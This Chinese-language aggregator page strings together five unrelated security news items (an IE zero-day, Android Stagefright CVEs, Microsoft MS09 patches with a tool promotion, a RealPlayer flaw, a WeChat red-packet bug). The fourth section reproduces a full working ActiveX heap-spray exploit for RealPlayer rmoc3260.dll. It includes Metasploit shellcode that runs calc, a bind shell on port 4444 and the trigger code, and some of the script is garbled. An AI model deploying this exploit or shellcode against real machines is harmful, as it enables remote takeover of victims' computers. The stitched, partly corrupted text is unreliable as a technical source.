一 : IE被曝存在严重漏洞 专家呼吁改用其他浏览器
北京时间9月18日早间消息,多名计算机安全专家本周表示,由于一个新发现的漏洞,PC用户应当暂停使用微软IE浏览器。
信息安全公司Rapid7工程经理托德·贝尔德斯利(Tod Beardsley)表示:“黑客有可能利用这一漏洞在你的电脑中从事非法活动。他们将可以获得你电脑中的所有文件。”微软则在一份声明中回应称:“我们正在积极调查这些报道,并将采取必要的措施保护用户。”
趋势科技高级威胁研究员保罗·费古森(Paul Ferguson)表示:“用户可以临时使用其他浏览器,直到这一问题得到解决。要不他们就只能碰运气。”而信息安全咨询公司Treadstone 71首席情报官杰夫·巴丁(Jeff Bardin)则表示:“为何要接受这样的风险?我倾向于远离IE。”
卢森堡e-Business & Resilience Centre的安全顾问埃里克·罗曼(Eric Romang)上周五在调查一处可能被黑客攻击的服务器时发现了这一漏洞。贝尔德斯利表示,这些黑客利用此前未发现的一个IE漏洞攻破了服务器。黑客可以在正常网站中植入恶意代码,导致访问网站的用户计算机被病毒感染。
根据StatCounter的数据,上月IE是全球排名第二的浏览器,市场份额为33%。而谷歌Chrome的市场份额为34%。
信息安全公司BeyondTrust首席技术官马克·梅弗雷特(Marc Maiffret)表示,一些企业可能无法停止使用IE,因为其应用和网站与Chrome或其他浏览器不兼容。对这样的公司来说,它们可以考虑使系统兼容Chrome。
二 : Android系统两大严重漏洞曝光:几乎所有安卓设备都会受到影响
研究人士称,“几乎每台Android设备”都会受到影响,无论其所搭载的是1.0版本Android系统还是最新的5.0版本。意味着超过10亿台Android设备都会受到被攻击的影响。
危害:
黑客利用这些漏洞欺骗用户访问含有恶意MP3或MP4文件的网站,如果用户预览被感染的多媒体文件(通常以音乐或视频方式出现),这台Android设备就会迅速被黑。这种被黑风险所涉及的问题是Android处理多媒体文件元数据的方式,该系统通过名为“Stagefright”的媒体播放引擎来对这种数据进行处理。
其实这些漏洞并不是安全研究人士首次发现,在今年早些时候,发现了上述漏洞的移动安全公司Zimperium zLabs披露了一系列的7个Stragefright漏洞,黑客可以利用这些漏洞仅通过一条被感染的多媒体文本信息就能黑掉最多9.5亿台Android设备。
最新发现的漏洞:
一个被称为“CVE-2015-6602”,这个漏洞影响到了从2008年第一代Android操作系统推出以来所发布的几乎所有Android设备;
第二个新漏洞则被称为“CVE-2015-3876”,影响到了搭载5.0版本Android及以上版本系统的设备,并使得上述问题更易触发。
这两个漏洞也可令黑客控制被黑的设备,取得对其数据、照片、摄像头和麦克风的准入权。
整体而言,这两个漏洞所带来的新问题更加广泛,原因是影响的设备更多。
谷歌发言人已经向《财富》杂志表示,该公司已在开发相关补丁。根据发言情况看,预计谷歌将在10月5日向Nexus设备公开提供补丁,你的Nexus设备收到了补丁了么?
三 : 微软有史以来最严重漏洞的弥补
6月10日凌晨微软发布了有史以来严重漏洞补丁升级公告!我们先看看严重会对用户直接造成经济损失的漏洞情况:
严重-MS09-022:Windows 打印后台处理程序中的漏洞可能允许远程执行代码 (961501)。该漏洞最为恐怖,主要解决黑客利用服务器共享打印机执行远程控制。当服务器被黑客控制以后可通过局网或Internet快速广播病毒从而会导致计算机批量成为“肉鸡”。
严重-MS09-019:Internet Explorer 的累积性安全更新 (969897)。该补丁是IE公开7大漏洞之一,许多用户可能仅仅浏览了一下网页就被安装上了木马导致网银账户被盗,不知道什么原因也不知道如何解决,在此刻微软终于发布了针对该漏洞的修复。
严重-MS09-019:Microsoft Office Word 中的漏洞可能允许远程执行代码 (969514);严重-MS09-027:Microsoft Office Excel 中的漏洞可能允许远程执行代码 (969462)。这两个补丁光看名称也就知道关于MS office的漏洞且该类漏洞已经不光是导致程序崩溃或错误,而是会给计算机用户带来直接经济损失的漏洞了。
软件名称: | Z武器 |
版本信息: | 2.28 |
软件大小: | 2.83 MB |
软件语言: | 中文 |
下载地址: | |
这里小编教你应用Z武器快速修复系统安全漏洞。启动Z武器之后,进入点击“漏洞修复”选项(图1),随后单击立刻更新漏洞库(图2)。
图1:漏洞修复
图2:更新安全补丁
凌晨更新意义非常重大且整个漏洞对于安全非常关键。以往补丁以BUG修复居多,而此次的漏洞修复主要是面对的是更多黑客直接远程控制用户计算机。此类漏洞如不及时修复将会给大家带来重大的紧急损失。
四 : RealPlayer又曝新漏洞
RealPlayer的漏洞问题越来越严重,milworm在昨天再次发布了一个Real Player 控件溢出漏洞。在环境 Windows XP SP2(fully patched) English, IE6测试成功运行calc。
该漏洞存在于rmoc3260.dll,并且只有 version 6.0.10.45可以被成功执行漏洞攻击。
在最新版本以及旧版本没有办法成功执行该漏洞。该DLL版本对应的REAL版本号为:6.0.14.748。请使用6.0.14.748版本的用户尽快安装新版本。
发布日期:2008-4-2
最后更新日期:2008-4-2 12:37(GMT)
real又报新洞。。。漏洞组件rmoc3260.dll版本6.0.10.45
程序代码
<!--
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>
<script language="JavaScript" defer>
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"
"%u314e%u7475%u7038%u7765%u4370");
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"
"%u684f%u3956%u386f%u4350");
var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize shellcode1.length;
while (bigblock.length < slackspace) bigblock = bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length slackspace < 0x40000) block = block block fillblock;
var memory = new Array();
for (i = 0; i < 400; i ){ memory[i] = block shellcode1 }
var buf = '';
while (buf.length < 32) buf = buf unescape("");
var m = '';
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
Unable to create object
</object>
</body>
</html>
五 : 微信重大高危漏洞曝光:黑客可随意领取别人红包
乌云漏洞平台今日发布最新高危漏洞(原文传送门),显示微信红包存在设计缺陷,黑客可以设计程序自动领取他人发送的红包,分分钟领取数百元。目前腾讯已经确认该漏洞,等待处理。
乌云漏洞平台显示,白帽黑客only-guest发现了微信红包的高危漏洞,源于厂商的客户端程序设计缺陷,黑客可以绕过权限,设计程序来随意领取红包。
该白帽黑客截图显示自己一分钟内领取了200多元红包,并在漏洞描述中玩笑称,“发家致富奔小康,日薪百万不是梦,估计写成程序一天几百万不是问题!”。
微信红包功能自推出以来,受到用户欢迎,在节假日期间形成多个使用高峰。而该高危漏洞的发布,显示该功能具有设计缺陷,发放和领取红包的用户存在遭受财务损失的可能性。
目前,这一漏洞细节已经通知厂商,等待处理。腾讯方面回复:“这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。”
- 软件名称:
- 微信 安卓版 v6.3.18 最新官方正式版
- 软件大小:
- 34.3MB
- 更新时间:
- 2016-05-26
本文标题:
flash曝严重漏洞-IE被曝存在严重漏洞 专家呼吁改用其他浏览器 本文地址:
http://www.61k.com/1164840.html